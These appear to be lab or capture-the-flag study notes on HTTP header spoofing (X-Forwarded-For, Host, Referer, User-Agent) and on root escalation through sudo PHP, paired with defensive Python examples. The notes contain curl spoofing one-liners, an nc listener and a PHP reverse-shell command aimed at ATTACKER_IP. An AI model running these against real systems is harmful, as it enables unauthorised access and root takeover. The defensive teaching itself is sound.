HTTP Header (X-Forwarded-For)
🔹 What is the X-Forwarded-For Header?
- It is an HTTP header that carries the original IP address of a client when a request passes through a proxy or load balancer.
- Some web servers use this header for security decisions such as IP-based access control.
🔹 The Exploit
- The challenge is to bypass an access restriction on a web page.
- The server checks for a specific IP address in the X-Forwarded-For header to grant access.
- By modifying the header manually, the user tricks the server into believing they are an authorized user.
🔹 Steps to Exploit
- Use cURL or a proxy tool (e.g., Burp Suite) to inspect the request headers.
- Modify the X-Forwarded-For header value to localhost (127.0.0.1).
- Submit the request again.
- The server mistakenly grants access.
Prevention Tips
- Use authentication mechanisms instead of relying on IP-based filtering.
- Implement server-side validation to ensure the header isn't blindly trusted.
HTTP Header Attacks
1. Commonly Exploited HTTP Headers
🔹 X-Forwarded-For (XFF)
- Used to store the original IP address of a client behind a proxy.
- Attackers can spoof their IP to bypass access restrictions.
💡 Example Attack:
curl -H "X-Forwarded-For: 127.0.0.1" http://target.com/admin
🔹 If the server trusts this header for authentication, the attacker gets access!
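How a server should treat X-Forwarded-For, covering both the challenge above and the general XFF case: the added example below (not code from the original notes) contrasts the vulnerable pattern of believing the leftmost header entry with a resolver that only consults the header when the TCP peer is one of our own proxies, and then walks it right-to-left past trusted hops. The proxy range, admin allowlist and addresses are constructed for the example.

```python
import ipaddress

# Constructed sample topology for this example: our own reverse proxies sit in
# 10.0.0.0/8; the admin page is meant only for loopback and a VPN range.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]
ADMIN_ALLOWLIST = [ipaddress.ip_network("127.0.0.1/32"),
                   ipaddress.ip_network("172.16.5.0/24")]


def _in_any(ip, networks):
    return any(ip in net for net in networks)


def naive_client_ip(remote_addr, xff_header):
    """The vulnerable pattern: believe the leftmost X-Forwarded-For entry,
    which is exactly the value a client can type in with curl -H."""
    if xff_header:
        return ipaddress.ip_address(xff_header.split(",")[0].strip())
    return ipaddress.ip_address(remote_addr)


def effective_client_ip(remote_addr, xff_header):
    """Return the address the server should act on, or None if the chain is
    unusable. remote_addr is the TCP peer (taken from the socket, never from a
    header); xff_header is the raw X-Forwarded-For value or None.

    The header is consulted only when the peer is one of our own proxies, and
    then read right-to-left: the rightmost entry was appended by that proxy,
    each entry further left by an earlier hop. The first entry that is not a
    proxy we control is the real client; anything left of it was supplied by
    the client and is ignored."""
    peer = ipaddress.ip_address(remote_addr)
    if not _in_any(peer, TRUSTED_PROXIES) or not xff_header:
        return peer  # direct connection: the header is client-controlled
    for hop in reversed([h.strip() for h in xff_header.split(",")]):
        try:
            ip = ipaddress.ip_address(hop)
        except ValueError:
            return None  # malformed entry injected somewhere: refuse to guess
        if not _in_any(ip, TRUSTED_PROXIES):
            return ip
    return peer  # every hop was one of our proxies (e.g. a health check)


def admin_allowed(remote_addr, xff_header, resolver=effective_client_ip):
    """Access decision for the admin page using the chosen IP resolver."""
    ip = resolver(remote_addr, xff_header)
    return ip is not None and _in_any(ip, ADMIN_ALLOWLIST)
```

With the naive resolver a direct request carrying `X-Forwarded-For: 127.0.0.1` is admitted; with `effective_client_ip` the same request resolves to the socket address and is refused, and a spoofed entry placed in front of a genuine proxy chain is skipped because the walk starts from the right. The page's first prevention tip still applies: even the correct resolver is only an allowlist, not authentication.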
🔹 Host Header Injection
- Some websites determine site functionality based on the Host header.
- Attackers can modify it to redirect users, bypass authentication, or exploit SSRF.
Example Attack:
curl -H "Host: evil.com" http://target.com
🔹 If the application relies on the Host header to generate links, an attacker might be able to redirect traffic to a malicious site.
Prevention:
- Validate the Host header against an allowlist of hostnames your application actually serves.
- Avoid relying on the Host header for authentication.
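What the Host allowlist looks like in practice, as an added example that is not part of the original notes: a normaliser that strips port and trailing dot and rejects anything that is not a plain DNS name, an allowlist check, and a password-reset link builder shown in its vulnerable form (origin taken from the header) and its safe form (origin taken from configuration). The hostnames, origin and `/reset` path are assumptions made for the example.

```python
import re
from urllib.parse import quote

# Constructed allowlist for this example: the names this deployment answers to.
ALLOWED_HOSTS = {"example.com", "www.example.com"}
# Absolute links are built from a configured origin, never from the request.
CANONICAL_ORIGIN = "https://www.example.com"

_HOSTNAME_RE = re.compile(
    r"^[a-z0-9]([a-z0-9-]*[a-z0-9])?(\.[a-z0-9]([a-z0-9-]*[a-z0-9])?)*$"
)


def normalise_host(host_header):
    """Reduce a Host header to a bare lower-case hostname, or None if it is
    not a plain DNS name (port stripped, trailing dot removed, IPv6 literals
    and anything with characters outside a hostname rejected)."""
    if host_header is None:
        return None
    host = host_header.strip().lower()
    if host.startswith("["):          # IPv6 literal: not a name we serve
        return None
    if ":" in host:                   # drop an explicit port
        host = host.rsplit(":", 1)[0]
    host = host.rstrip(".")
    if not host or len(host) > 253 or not _HOSTNAME_RE.match(host):
        return None
    return host


def host_is_allowed(host_header):
    host = normalise_host(host_header)
    return host is not None and host in ALLOWED_HOSTS


def vulnerable_reset_link(host_header, token):
    """The pattern the attack abuses: the link's origin comes from the header,
    so Host: evil.com puts the victim's token in a URL the attacker controls."""
    return f"https://{host_header}/reset?token={quote(token)}"


def safe_reset_link(host_header, token):
    """Reject requests for hostnames we do not serve, and build the link from
    CANONICAL_ORIGIN so the header cannot influence where the token is sent."""
    if not host_is_allowed(host_header):
        raise ValueError("unrecognised Host header")
    return f"{CANONICAL_ORIGIN}/reset?token={quote(token)}"
```

The two defences are independent: rejecting unknown hosts stops the application from serving the attacker's request at all, and building links from configuration means that even a name that slips through cannot redirect the token. A web framework's allowed-hosts setting is the usual place for the first check.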
Referer Header Manipulation
- Some web applications allow or deny access based on the Referer header.
- Attackers can fake it to bypass CSRF (Cross-Site Request Forgery) protection.
💡 Example Attack:
curl -H "Referer: http://trusted-site.com" http://target.com/secure-page
🔹 If the site only checks the Referer and not proper authentication, the attacker gains access!
✅ Prevention:
- Do NOT rely solely on the Referer header for security.
- Use CSRF tokens instead.
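The difference between a Referer check and a CSRF token, as an added example rather than code from the original notes: a prefix match on Referer is satisfied by any client that sets the header, whereas a random token bound to the server-side session can only be supplied by a page the browser loaded from the site itself. The origin, session store and form field name are assumptions made for the example.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://target.example"   # constructed origin for this example

# Server-side session store: session id -> session data (in-memory for the example).
SESSIONS = {}


def start_session():
    """Create a session and bind a fresh random CSRF token to it."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"csrf_token": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid):
    """Token to embed as a hidden form field in pages rendered for this session."""
    return SESSIONS[sid]["csrf_token"]


def referer_only_check(headers):
    """The weak control from the notes: any request whose Referer starts with
    a trusted prefix is accepted. The client sets the header, so curl -H
    satisfies it trivially, and so does a lookalike domain."""
    return headers.get("Referer", "").startswith(SITE_ORIGIN)


def referer_origin_matches(headers):
    """Defence in depth only: compare the Referer's origin exactly rather than
    by prefix, so https://target.example.attacker.test does not pass. Still
    never sufficient on its own, because the header is client-controlled."""
    ref = headers.get("Referer")
    if not ref:
        return False
    parts = urlsplit(ref)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def csrf_token_check(sid, submitted_token):
    """The proper control: the submitted token must equal the one bound to the
    caller's session, compared in constant time. A forged cross-site request
    cannot read the token out of the victim's page, so it cannot supply it."""
    session = SESSIONS.get(sid)
    if session is None or not submitted_token:
        return False
    return hmac.compare_digest(session["csrf_token"].encode(),
                               submitted_token.encode())


def handle_state_changing_request(sid, headers, form):
    """Accept the request only when the session-bound token verifies; the
    Referer header plays no part in the decision."""
    return csrf_token_check(sid, form.get("csrf_token"))
```

The test below shows the prefix-based Referer check accepting a lookalike origin while the token check refuses a request that carries a perfect Referer but no valid token.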
🔹 User-Agent Spoofing
- Web applications sometimes restrict access based on the browser type (User-Agent).
- Attackers can change their User-Agent to impersonate another device or bot.
Example Attack:
curl -H "User-Agent: Googlebot" http://target.com/hidden-page
🔹 Some sites grant special access to search engines (like Googlebot). If the crawler is not verified properly, an attacker can exploit it.
✅ Prevention:
- Verify a claimed crawler by checking the request's origin IP rather than trusting the User-Agent string.
- Use CAPTCHAs for additional validation.
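Verifying a claimed Googlebot by its source IP, as an added example that is not from the original notes: the PTR record for the address must fall under a Google crawler domain, and that name must resolve forward to the same address (the two-step check Google documents for crawler verification). The resolvers are injectable so the example runs offline against constructed DNS data; the real lookups use the standard `socket` module.

```python
import socket

# Domains a genuine Google crawler's reverse-DNS name must fall under.
GOOGLE_CRAWLER_DOMAINS = ("googlebot.com", "google.com")


def _system_reverse(ip):
    return socket.gethostbyaddr(ip)[0]


def _system_forward(name):
    return socket.gethostbyname_ex(name)[2]   # IPv4 addresses for the name


def verify_google_crawler(ip, reverse_lookup=_system_reverse,
                          forward_lookup=_system_forward):
    """Two-step check: the PTR name for the source IP must be under a Google
    crawler domain, and that name must resolve forward to the same IP. An
    attacker can control the PTR record for their own address space but not
    the forward zone for googlebot.com, so the second step is what bites."""
    try:
        name = reverse_lookup(ip)
    except OSError:          # no PTR record at all
        return False
    name = name.rstrip(".").lower()
    if not any(name == d or name.endswith("." + d) for d in GOOGLE_CRAWLER_DOMAINS):
        return False
    try:
        forward = forward_lookup(name)
    except OSError:          # the claimed name does not resolve
        return False
    return ip in forward


def grant_crawler_access(user_agent, ip, **lookups):
    """Decision for the 'hidden-page' case: the User-Agent only selects which
    verification to run; it never grants access by itself."""
    if "googlebot" not in user_agent.lower():
        return False
    return verify_google_crawler(ip, **lookups)


# Constructed fake DNS data (documentation address ranges) so the example runs offline.
FAKE_PTR = {
    "203.0.113.5": "crawl-203-0-113-5.googlebot.com",   # consistent forward and reverse
    "198.51.100.9": "googlebot.com.attacker.example",    # lookalike PTR, wrong domain
    "198.51.100.10": "crawl.googlebot.com",              # spoofed PTR, forward disagrees
}
FAKE_A = {
    "crawl-203-0-113-5.googlebot.com": ["203.0.113.5"],
    "crawl.googlebot.com": ["203.0.113.77"],
}


def fake_reverse(ip):
    if ip not in FAKE_PTR:
        raise OSError("no PTR record")
    return FAKE_PTR[ip]


def fake_forward(name):
    if name not in FAKE_A:
        raise OSError("NXDOMAIN")
    return FAKE_A[name]
```

Call `grant_crawler_access(user_agent, ip)` without the keyword arguments to use live DNS. Cache verified addresses, since two lookups per request is too slow to do inline on a busy site.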
Linux Privilege Escalation using PHP
🔹 The Exploit
- The user gains SSH access to a low-privilege account.
- They discover that the user “Alice” can execute PHP as root.
- By running a PHP reverse shell, they escalate privileges to root access.
🔹 Steps to Exploit
- Check for misconfigured sudo permissions:
sudo -l
- Output shows that Alice can run PHP with root privileges.
- Set up a listener on the attacker's machine:
nc -lvnp 4545
- Run a reverse shell payload on the target machine:
sudo php -r '$sock=fsockopen("ATTACKER_IP",4545);exec("/bin/sh -i <&3 >&3 2>&3");'
- The attacker now has root access to the system.
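Every step above leaves a trace: sudo logs each invocation (including `sudo -l`, recorded as `COMMAND=list`) to the auth log with the invoking user, target user and full command line. The added example below (not code from the original notes) parses that format and flags an interpreter run as root, with the highest severity when it is handed inline code via `-r`, `-c` or `-e`. The log excerpt is constructed; the line format follows sudo's syslog output.

```python
import os
import re
import shlex

# Constructed auth.log excerpt in the format sudo writes via syslog.
SAMPLE_LOG = """\
Jun  1 09:14:02 web01 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=list
Jun  1 09:14:20 web01 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt-get update
Jun  1 09:15:40 web01 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/php -r 'phpinfo();'
Jun  1 09:16:01 web01 sudo:      bob : TTY=pts/1 ; PWD=/srv/app ; USER=root ; COMMAND=/usr/bin/php /srv/app/cron.php
Jun  1 09:16:30 web01 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/bin/systemctl restart nginx
"""

SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : TTY=(?P<tty>\S+) ; PWD=(?P<pwd>.+?) ; "
    r"USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.+)$"
)

# Interpreters that turn a sudo rule into an unrestricted root shell, with the
# flag each uses to run code passed on the command line.
INLINE_CODE_FLAG = {"php": "-r", "python": "-c", "perl": "-e", "ruby": "-e",
                    "node": "-e", "bash": "-c", "sh": "-c"}


def parse_sudo_line(line):
    """Return the sudo event fields from one syslog line, or None if it is not one."""
    m = SUDO_RE.search(line)
    return m.groupdict() if m else None


def _program_name(cmd):
    """Basename of argv[0] with a trailing version stripped (python3.11 -> python),
    plus the remaining arguments."""
    try:
        argv = shlex.split(cmd)
    except ValueError:            # unbalanced quotes: fall back to whitespace split
        argv = cmd.split()
    if not argv:
        return None, []
    name = re.sub(r"[\d.]+$", "", os.path.basename(argv[0]))
    return name, argv[1:]


def assess(event):
    """Return a severity for one parsed sudo event, or None when it is benign."""
    if event["cmd"] == "list":
        return "low"      # `sudo -l`: privilege enumeration, worth correlating
    name, args = _program_name(event["cmd"])
    flag = INLINE_CODE_FLAG.get(name)
    if flag is None:
        return None       # not an interpreter
    if event["target"] == "root" and flag in args:
        return "high"     # interpreter executing inline code as root
    return "medium"       # interpreter under a privileged user: unrestricted in practice


def scan(log_text):
    """Return (severity, user, command) for every suspicious line."""
    findings = []
    for line in log_text.splitlines():
        event = parse_sudo_line(line)
        if event is None:
            continue
        severity = assess(event)
        if severity:
            findings.append((severity, event["user"], event["cmd"]))
    return findings
```

The "medium" finding is the configuration problem itself: a sudoers entry that allows an interpreter at all, even for a fixed script path, is a root shell waiting to happen, so the fix is to grant a specific wrapper script (owned and writable by root only) rather than the interpreter. The "high" finding is the event to alert on.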